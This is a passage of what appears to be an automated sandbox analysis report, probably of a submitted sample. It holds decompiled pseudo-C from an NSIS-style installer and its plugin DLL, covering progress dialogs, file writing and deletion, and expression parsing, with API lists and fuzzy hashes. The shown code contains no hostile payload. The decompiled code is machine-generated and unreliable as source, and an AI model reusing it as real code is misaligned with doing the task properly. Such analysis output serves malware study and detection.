                                                                                						if((_v12 & 0x00000002) == 0) {
                                                                                							_v32 = 0x42a098;
                                                                                							_v52 = 1;
                                                                                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                							_v44 = 0;
                                                                                							_v48 = _t29 - _t39;
                                                                                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                						}
                                                                                						if(_t39 != 0) {
                                                                                							_t28 = _a4;
                                                                                							 *((char*)(_t28 + 0x42a098)) = 0;
                                                                                							return _t28;
                                                                                						}
                                                                                					} else {
                                                                                						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                						if(_t26 < 0x800) {
                                                                                							_t26 = lstrcatA(0x42a098, _a8);
                                                                                							goto L6;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t26;
                                                                                			}


















                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2531174081-0
                                                                                • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                                • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00402E52(intOrPtr _a4) {
                                                                                				char _v68;
                                                                                				long _t6;
                                                                                				struct HWND__* _t7;
                                                                                				struct HWND__* _t15;
                                                                                
                                                                                				if(_a4 != 0) {
                                                                                					_t15 =  *0x42946c;
                                                                                					if(_t15 != 0) {
                                                                                						_t15 = DestroyWindow(_t15);
                                                                                					}
                                                                                					 *0x42946c = 0;
                                                                                					return _t15;
                                                                                				}
                                                                                				if( *0x42946c != 0) {
                                                                                					return E00406692(0);
                                                                                				}
                                                                                				_t6 = GetTickCount();
                                                                                				if(_t6 >  *0x42f450) {
                                                                                					if( *0x42f448 == 0) {
                                                                                						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
                                                                                						 *0x42946c = _t7;
                                                                                						return ShowWindow(_t7, 5);
                                                                                					}
                                                                                					if(( *0x42f514 & 0x00000001) != 0) {
                                                                                						wsprintfA( &_v68, "... %d%%", E00402E36());
                                                                                						return E00405374(0,  &_v68);
                                                                                					}
                                                                                				}
                                                                                				return _t6;
                                                                                			}








                                                                                APIs
                                                                                • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                                                • GetTickCount.KERNEL32 ref: 00402E88
                                                                                • wsprintfA.USER32 ref: 00402EB6
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                  • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                  • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                  • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                • String ID: ... %d%%
                                                                                • API String ID: 722711167-2449383134
                                                                                • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                                • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
                                                                                				long _v8;
                                                                                				signed char _v12;
                                                                                				unsigned int _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				long _v56;
                                                                                				void* _v60;
                                                                                				long _t15;
                                                                                				unsigned int _t19;
                                                                                				signed int _t25;
                                                                                				struct HWND__* _t28;
                                                                                
                                                                                				_t28 = _a4;
                                                                                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                				if(_a8 == 0) {
                                                                                					L4:
                                                                                					_v56 = _t15;
                                                                                					_v60 = 4;
                                                                                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                					return _v24;
                                                                                				}
                                                                                				_t19 = GetMessagePos();
                                                                                				_v16 = _t19 >> 0x10;
                                                                                				_v20 = _t19;
                                                                                				ScreenToClient(_t28,  &_v20);
                                                                                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                				if((_v12 & 0x00000066) != 0) {
                                                                                					_t15 = _v8;
                                                                                					goto L4;
                                                                                				}
                                                                                				return _t25 | 0xffffffff;
                                                                                			}















                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
                                                                                • GetMessagePos.USER32 ref: 00404C47
                                                                                • ScreenToClient.USER32 ref: 00404C61
                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                                • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                                                				char _v68;
                                                                                				void* _t11;
                                                                                				CHAR* _t19;
                                                                                
                                                                                				if(_a8 == 0x110) {
                                                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                                                					_a8 = 0x113;
                                                                                				}
                                                                                				if(_a8 == 0x113) {
                                                                                					_t11 = E00402E36();
                                                                                					_t19 = "unpacking data: %d%%";
                                                                                					if( *0x42f454 == 0) {
                                                                                						_t19 = "verifying installer: %d%%";
                                                                                					}
                                                                                					wsprintfA( &_v68, _t19, _t11);
                                                                                					SetWindowTextA(_a4,  &_v68);
                                                                                					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                				}
                                                                                				return 0;
                                                                                			}







                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                • wsprintfA.USER32 ref: 00402E09
                                                                                • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                • SetDlgItemTextA.USER32 ref: 00402E2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                • API String ID: 1451636040-1158693248
                                                                                • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                                • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E6F7122F1(void* __edx, intOrPtr _a4) {
                                                                                				signed int _v4;
                                                                                				signed int _v8;
                                                                                				void* _t38;
                                                                                				signed int _t39;
                                                                                				void* _t40;
                                                                                				void* _t43;
                                                                                				void* _t48;
                                                                                				signed int* _t50;
                                                                                				signed char* _t51;
                                                                                
                                                                                				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                                                				while(1) {
                                                                                					_t9 = _a4 + 0x818; // 0x818
                                                                                					_t51 = (_v8 << 5) + _t9;
                                                                                					_t38 = _t51[0x18];
                                                                                					if(_t38 == 0) {
                                                                                						goto L9;
                                                                                					}
                                                                                					_t48 = 0x1a;
                                                                                					if(_t38 == _t48) {
                                                                                						goto L9;
                                                                                					}
                                                                                					if(_t38 != 0xffffffff) {
                                                                                						if(_t38 <= 0 || _t38 > 0x19) {
                                                                                							_t51[0x18] = _t48;
                                                                                						} else {
                                                                                							_t38 = E6F7112AD(_t38 - 1);
                                                                                							L10:
                                                                                						}
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_t38 = E6F71123B();
                                                                                						L11:
                                                                                						_t43 = _t38;
                                                                                						_t13 =  &(_t51[8]); // 0x820
                                                                                						_t50 = _t13;
                                                                                						if(_t51[4] >= 0) {
                                                                                						}
                                                                                						_t39 =  *_t51 & 0x000000ff;
                                                                                						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                                                                						_v4 = _t39;
                                                                                						if(_t39 > 7) {
                                                                                							L27:
                                                                                							_t40 = GlobalFree(_t43);
                                                                                							if(_v8 == 0) {
                                                                                								return _t40;
                                                                                							}
                                                                                							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                                                								_v8 = _v8 + 1;
                                                                                							} else {
                                                                                								_v8 = _v8 & 0x00000000;
                                                                                							}
                                                                                							continue;
                                                                                						} else {
                                                                                							switch( *((intOrPtr*)(_t39 * 4 +  &M6F71247E))) {
                                                                                								case 0:
                                                                                									 *_t50 =  *_t50 & 0x00000000;
                                                                                									goto L27;
                                                                                								case 1:
                                                                                									__eax = E6F7112FE(__ebx);
                                                                                									goto L20;
                                                                                								case 2:
                                                                                									 *__ebp = E6F7112FE(__ebx);
                                                                                									_a4 = __edx;
                                                                                									goto L27;
                                                                                								case 3:
                                                                                									__eax = E6F711224(__ebx);
                                                                                									 *(__esi + 0x1c) = __eax;
                                                                                									L20:
                                                                                									 *__ebp = __eax;
                                                                                									goto L27;
                                                                                								case 4:
                                                                                									 *0x6f71405c =  *0x6f71405c +  *0x6f71405c;
                                                                                									__edi = GlobalAlloc(0x40,  *0x6f71405c +  *0x6f71405c);
                                                                                									 *0x6f71405c = MultiByteToWideChar(0, 0, __ebx,  *0x6f71405c, __edi,  *0x6f71405c);
                                                                                									if(_v4 != 5) {
                                                                                										 *(__esi + 0x1c) = __edi;
                                                                                										 *__ebp = __edi;
                                                                                									} else {
                                                                                										__eax = GlobalAlloc(0x40, 0x10);
                                                                                										_push(__eax);
                                                                                										 *(__esi + 0x1c) = __eax;
                                                                                										_push(__edi);
                                                                                										 *__ebp = __eax;
                                                                                										__imp__CLSIDFromString();
                                                                                										__eax = GlobalFree(__edi);
                                                                                									}
                                                                                									goto L27;
                                                                                								case 5:
                                                                                									if( *__ebx != 0) {
                                                                                										__eax = E6F7112FE(__ebx);
                                                                                										 *__edi = __eax;
                                                                                									}
                                                                                									goto L27;
                                                                                								case 6:
                                                                                									__esi =  *(__esi + 0x18);
                                                                                									__esi = __esi - 1;
                                                                                									__esi = __esi *  *0x6f71405c;
                                                                                									__esi = __esi +  *0x6f714064;
                                                                                									__eax = __esi + 0xc;
                                                                                									 *__edi = __esi + 0xc;
                                                                                									asm("cdq");
                                                                                									__eax = E6F711429(__edx, __esi + 0xc, __edx, __esi);
                                                                                									goto L27;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					L9:
                                                                                					_t38 = E6F711224(0x6f714034);
                                                                                					goto L10;
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                • GlobalFree.KERNEL32 ref: 6F712447
                                                                                  • Part of subcall function 6F711224: lstrcpynA.KERNEL32(00000000,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F711234
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6F7123C2
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6F7123D7
                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6F7123E8
                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 6F7123F6
                                                                                • GlobalFree.KERNEL32 ref: 6F7123FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3730416702-0
                                                                                • Opcode ID: 57e45122058362e87ab64e55f096532d23c51fe4c4d92f71a568adab3af06fd7
                                                                                • Instruction ID: 909af7875d698f337aeadbea0f763fcd9ceeed95471d3517e5f835f4887de97e
                                                                                • Opcode Fuzzy Hash: 57e45122058362e87ab64e55f096532d23c51fe4c4d92f71a568adab3af06fd7
                                                                                • Instruction Fuzzy Hash: A6419DB150C341DFD710CF649A45B6AB7F8FF82325F084AAEE845CA190D770A95CCBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004027DF(void* __ebx, void* __eflags) {
                                                                                				void* _t26;
                                                                                				long _t31;
                                                                                				void* _t45;
                                                                                				void* _t49;
                                                                                				void* _t51;
                                                                                				void* _t54;
                                                                                				void* _t55;
                                                                                				void* _t56;
                                                                                
                                                                                				_t45 = __ebx;
                                                                                				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                				_t50 = E00402BCE(0xfffffff0);
                                                                                				 *(_t56 - 0x78) = _t23;
                                                                                				if(E00405C52(_t50) == 0) {
                                                                                					E00402BCE(0xffffffed);
                                                                                				}
                                                                                				E00405DC1(_t50);
                                                                                				_t26 = E00405DE6(_t50, 0x40000000, 2);
                                                                                				 *(_t56 + 8) = _t26;
                                                                                				if(_t26 != 0xffffffff) {
                                                                                					_t31 =  *0x42f458;
                                                                                					 *(_t56 - 0x30) = _t31;
                                                                                					_t49 = GlobalAlloc(0x40, _t31);
                                                                                					if(_t49 != _t45) {
                                                                                						E0040343E(_t45);
                                                                                						E00403428(_t49,  *(_t56 - 0x30));
                                                                                						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                						 *(_t56 - 0x38) = _t54;
                                                                                						if(_t54 != _t45) {
                                                                                							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                							while( *_t54 != _t45) {
                                                                                								_t47 =  *_t54;
                                                                                								_t55 = _t54 + 8;
                                                                                								 *(_t56 - 0x8c) =  *_t54;
                                                                                								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                								_t54 = _t55 +  *(_t56 - 0x8c);
                                                                                							}
                                                                                							GlobalFree( *(_t56 - 0x38));
                                                                                						}
                                                                                						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                                						GlobalFree(_t49);
                                                                                						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                					}
                                                                                					CloseHandle( *(_t56 + 8));
                                                                                				}
                                                                                				_t51 = 0xfffffff3;
                                                                                				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                					_t51 = 0xffffffef;
                                                                                					DeleteFileA( *(_t56 - 0x78));
                                                                                					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                				}
                                                                                				_push(_t51);
                                                                                				E00401423();
                                                                                				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
                                                                                				return 0;
                                                                                			}












                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                • GlobalFree.KERNEL32 ref: 0040288E
                                                                                • GlobalFree.KERNEL32 ref: 004028A1
                                                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                • String ID:
                                                                                • API String ID: 2667972263-0
                                                                                • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                                • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E6F711837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                                                				void* _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v20;
                                                                                				signed int _v24;
                                                                                				char _v52;
                                                                                				void _t45;
                                                                                				void _t46;
                                                                                				signed int _t47;
                                                                                				signed int _t48;
                                                                                				signed int _t57;
                                                                                				signed int _t58;
                                                                                				signed int _t59;
                                                                                				signed int _t60;
                                                                                				signed int _t61;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				signed int _t77;
                                                                                				void* _t81;
                                                                                				signed int _t83;
                                                                                				signed int _t85;
                                                                                				signed int _t87;
                                                                                				signed int _t90;
                                                                                				void* _t101;
                                                                                
                                                                                				_t85 = __edx;
                                                                                				 *0x6f71405c = _a8;
                                                                                				_t77 = 0;
                                                                                				 *0x6f714060 = _a16;
                                                                                				_v12 = 0;
                                                                                				_v8 = E6F71123B();
                                                                                				_t90 = E6F7112FE(_t42);
                                                                                				_t87 = _t85;
                                                                                				_t81 = E6F71123B();
                                                                                				_a8 = _t81;
                                                                                				_t45 =  *_t81;
                                                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                                                					_a16 = E6F71123B();
                                                                                					_t77 = E6F7112FE(_t74);
                                                                                					_v12 = _t85;
                                                                                					GlobalFree(_a16);
                                                                                					_t81 = _a8;
                                                                                				}
                                                                                				_t46 =  *_t81;
                                                                                				_t101 = _t46 - 0x2f;
                                                                                				if(_t101 > 0) {
                                                                                					_t47 = _t46 - 0x3c;
                                                                                					__eflags = _t47;
                                                                                					if(_t47 == 0) {
                                                                                						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
                                                                                						if( *((char*)(_t81 + 1)) != 0x3c) {
                                                                                							__eflags = _t87 - _v12;
                                                                                							if(__eflags > 0) {
                                                                                								L56:
                                                                                								_t48 = 0;
                                                                                								__eflags = 0;
                                                                                								L57:
                                                                                								asm("cdq");
                                                                                								L58:
                                                                                								_t90 = _t48;
                                                                                								_t87 = _t85;
                                                                                								L59:
                                                                                								E6F711429(_t85, _t90, _t87,  &_v52);
                                                                                								E6F711266( &_v52);
                                                                                								GlobalFree(_v8);
                                                                                								return GlobalFree(_a8);
                                                                                							}
                                                                                							if(__eflags < 0) {
                                                                                								L49:
                                                                                								__eflags = 0;
                                                                                								L50:
                                                                                								_t48 = 1;
                                                                                								goto L57;
                                                                                							}
                                                                                							__eflags = _t90 - _t77;
                                                                                							if(_t90 < _t77) {
                                                                                								goto L49;
                                                                                							}
                                                                                							goto L56;
                                                                                						}
                                                                                						_t85 = _t87;
                                                                                						_t48 = E6F712EF0(_t90, _t77, _t85);
                                                                                						goto L58;
                                                                                					}
                                                                                					_t57 = _t47 - 1;
                                                                                					__eflags = _t57;
                                                                                					if(_t57 == 0) {
                                                                                						__eflags = _t90 - _t77;
                                                                                						if(_t90 != _t77) {
                                                                                							goto L56;
                                                                                						}
                                                                                						__eflags = _t87 - _v12;
                                                                                						if(_t87 != _v12) {
                                                                                							goto L56;
                                                                                						}
                                                                                						goto L49;
                                                                                					}
                                                                                					_t58 = _t57 - 1;
                                                                                					__eflags = _t58;
                                                                                					if(_t58 == 0) {
                                                                                						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
                                                                                						if( *((char*)(_t81 + 1)) != 0x3e) {
                                                                                							__eflags = _t87 - _v12;
                                                                                							if(__eflags < 0) {
                                                                                								goto L56;
                                                                                							}
                                                                                							if(__eflags > 0) {
                                                                                								goto L49;
                                                                                							}
                                                                                							__eflags = _t90 - _t77;
                                                                                							if(_t90 <= _t77) {
                                                                                								goto L56;
                                                                                							}
                                                                                							goto L49;
                                                                                						}
                                                                                						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
                                                                                						_t85 = _t87;
                                                                                						_t59 = _t90;
                                                                                						_t83 = _t77;
                                                                                						if( *((char*)(_t81 + 2)) != 0x3e) {
                                                                                							_t48 = E6F712F10(_t59, _t83, _t85);
                                                                                						} else {
                                                                                							_t48 = E6F712F40(_t59, _t83, _t85);
                                                                                						}
                                                                                						goto L58;
                                                                                					}
                                                                                					_t60 = _t58 - 0x20;
                                                                                					__eflags = _t60;
                                                                                					if(_t60 == 0) {
                                                                                						_t90 = _t90 ^ _t77;
                                                                                						_t87 = _t87 ^ _v12;
                                                                                						goto L59;
                                                                                					}
                                                                                					_t61 = _t60 - 0x1e;
                                                                                					__eflags = _t61;
                                                                                					if(_t61 == 0) {
                                                                                						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
                                                                                						if( *((char*)(_t81 + 1)) != 0x7c) {
                                                                                							_t90 = _t90 | _t77;
                                                                                							_t87 = _t87 | _v12;
                                                                                							goto L59;
                                                                                						}
                                                                                						__eflags = _t90 | _t87;
                                                                                						if((_t90 | _t87) != 0) {
                                                                                							goto L49;
                                                                                						}
                                                                                						__eflags = _t77 | _v12;
                                                                                						if((_t77 | _v12) != 0) {
                                                                                							goto L49;
                                                                                						}
                                                                                						goto L56;
                                                                                					}
                                                                                					__eflags = _t61 == 0;
                                                                                					if(_t61 == 0) {
                                                                                						_t90 =  !_t90;
                                                                                						_t87 =  !_t87;
                                                                                					}
                                                                                					goto L59;
                                                                                				}
                                                                                				if(_t101 == 0) {
                                                                                					L21:
                                                                                					__eflags = _t77 | _v12;
                                                                                					if((_t77 | _v12) != 0) {
                                                                                						_v24 = E6F712D80(_t90, _t87, _t77, _v12);
                                                                                						_v20 = _t85;
                                                                                						_t48 = E6F712E30(_t90, _t87, _t77, _v12);
                                                                                						_t81 = _a8;
                                                                                					} else {
                                                                                						_v24 = _v24 & 0x00000000;
                                                                                						_v20 = _v20 & 0x00000000;
                                                                                						_t48 = _t90;
                                                                                						_t85 = _t87;
                                                                                					}
                                                                                					__eflags =  *_t81 - 0x2f;
                                                                                					if( *_t81 != 0x2f) {
                                                                                						goto L58;
                                                                                					} else {
                                                                                						_t90 = _v24;
                                                                                						_t87 = _v20;
                                                                                						goto L59;
                                                                                					}
                                                                                				}
                                                                                				_t67 = _t46 - 0x21;
                                                                                				if(_t67 == 0) {
                                                                                					_t48 = 0;
                                                                                					__eflags = _t90 | _t87;
                                                                                					if((_t90 | _t87) != 0) {
                                                                                						goto L57;
                                                                                					}
                                                                                					goto L50;
                                                                                				}
                                                                                				_t68 = _t67 - 4;
                                                                                				if(_t68 == 0) {
                                                                                					goto L21;
                                                                                				}
                                                                                				_t69 = _t68 - 1;
                                                                                				if(_t69 == 0) {
                                                                                					__eflags =  *((char*)(_t81 + 1)) - 0x26;
                                                                                					if( *((char*)(_t81 + 1)) != 0x26) {
